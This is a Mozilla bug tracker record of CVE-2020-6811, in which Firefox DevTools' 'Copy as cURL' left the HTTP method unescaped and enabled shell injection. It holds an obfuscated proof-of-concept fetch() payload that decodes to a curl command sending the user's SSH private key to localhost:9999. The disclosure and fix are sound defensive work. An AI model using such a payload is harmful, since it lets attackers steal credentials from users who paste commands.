Closed Bug 1607742 (CVE-2020-6811) Opened 1 year ago Closed 1 year ago

'Copy As Curl' in the network panel of the devtools does not escape the HTTP method properly, leading to local code execution

Categories

(DevTools :: Netmonitor, defect, P2)

Product:
DevTools
Component:
Netmonitor
Type:
defect

Tracking

(firefox-esr6874+ fixed, firefox73 wontfix, firefox74+ fixed, firefox75+ fixed)

Status:
RESOLVED FIXED
Milestone:
Firefox 75
Tracking Flags:
Tracking Status
firefox-esr68 74+ fixed
firefox73 --- wontfix
firefox74 + fixed
firefox75 + fixed

People

(Reporter: pere.jobs, Assigned: Honza)

References

Details

(Keywords: sec-moderate, Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main74+][adv-esr68.6+])

Attachments

(3 files, 1 obsolete file)

bug.html
57 bytes, text/html
Details
Escape method argument
47 bytes, text/x-phabricator-request
RyanVM
: approval-mozilla-beta+
RyanVM
: approval-mozilla-esr68+
Details | Review
advisory.txt
443 bytes, text/plain
Details
Attached file bug.html

Firefox devtools have a 'network' panel, where all the requests made by the current webpage are listed.
In this panel, the user can right-click on a query, and then select 'Copy As cURL'. The user is then expected to paste what he just copied into a terminal.
The issue is that the HTTP method of the request, which is controlled by the potentially malicious webpage, is not escaped when the curl command is formed.

As an example, the following javascript snippet will make a problematic request:

fetch('', {method: '|evilcommand|'});

When this snippet is run, and then a naive user uses 'Copy as cURL' on the generated request and then pastes it into a terminal, evilcommand is executed.

Note: an HTTP verb cannot contain a space (so one can not launch evilcommand with arguments), but the following characters are allowed, making it possible to construct complex malicious payloads: ` ' . * $ & | ~.

Flags: sec-bounty?

The problem seems to come from this line, where the HTTP method is added to the command without any escaping:

https://dxr.mozilla.org/mozilla-central/source/devtools/client/shared/curl.js#122

Honza, can you take a look?

Type: task → defect
Component: Security → Netmonitor
Flags: needinfo?(odvarko)
Product: Firefox → DevTools

Here is an example exploit:

fetch('/', {method: '&echo$IFS`echo`6375726c206c6f63616c686f73743a39393939202d2d64617461202224283c207e2f2e7373682f69645f72736129220a|xxd$IFS`echo`-r$IFS`echo`-p|sh&'});

When the generated request is copied as cURL and pasted to a terminal, the user's ssh private key is sent to a server (localhost:9999 in this example).

Assignee: nobody → odvarko

Hello ! Anything new ? Do you need help making a patch ?

This should be as simple as replacing

      command.push(data.method);

with

      command.push(escapeString(data.method));

in https://dxr.mozilla.org/mozilla-central/source/devtools/client/shared/curl.js#122

Also, this bug still has the status UNCONFIRMED. Were you able to reproduce it ? Do you need more information about how to reproduce it ?

I think you've found the patch since your last comments...

As for the status field, I think the automatic update just missed it...

Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Flags: sec-bounty? → sec-bounty+

https://hg.mozilla.org/integration/autoland/rev/4e6cf4c65e2153dd212512aae8b43eea39ce4f36
https://hg.mozilla.org/mozilla-central/rev/4e6cf4c65e21

Group: firefox-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 1 year ago
status-firefox75: --- → fixed
Resolution: --- → FIXED
Target Milestone: --- → Firefox 75

Please nominate this for Beta and ESR68 approval when you get a chance.

status-firefox73: --- → wontfix
status-firefox74: --- → affected
status-firefox-esr68: --- → affected

Comment on attachment 9121841 [details]
Escape method argument

Beta/Release Uplift Approval Request

  • User impact if declined: Potential risk of evaluating an evil script when user uses 'Copy as cURL' on HTTP request and pastes it into a terminal.
  • Is this code covered by automated tests?: No
  • Has the fix been verified in Nightly?: Yes
  • Needs manual test from QE?: No
  • If yes, steps to reproduce:
  • List of other uplifts needed: None
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky): Small patch, only impacts web developers (DevTools)
  • String changes made/needed:
Flags: needinfo?(odvarko)
Attachment #9121841 - Flags: approval-mozilla-beta?

Comment on attachment 9121841 [details]
Escape method argument

ESR Uplift Approval Request

  • If this is not a sec:{high,crit} bug, please state case for ESR consideration: Potential risk of evaluating an evil script when user uses 'Copy as cURL' on HTTP request and pastes it into a terminal.
  • User impact if declined:
  • Fix Landed on Version:
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky): Small patch, only affects web developers (DevTools)
  • String or UUID changes made by this patch:
Attachment #9121841 - Flags: approval-mozilla-esr68?
Priority: -- → P2

Comment on attachment 9121841 [details]
Escape method argument

Fixes a devtools sec bug. Approved for 74.0b4 and 68.6esr.

Attachment #9121841 - Flags: approval-mozilla-esr68?
Attachment #9121841 - Flags: approval-mozilla-esr68+
Attachment #9121841 - Flags: approval-mozilla-beta?
Attachment #9121841 - Flags: approval-mozilla-beta+
Flags: qe-verify-
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]
Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main74+][adv-main68.6+]
Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main74+][adv-main68.6+] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main74+][adv-esr68.6+]
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.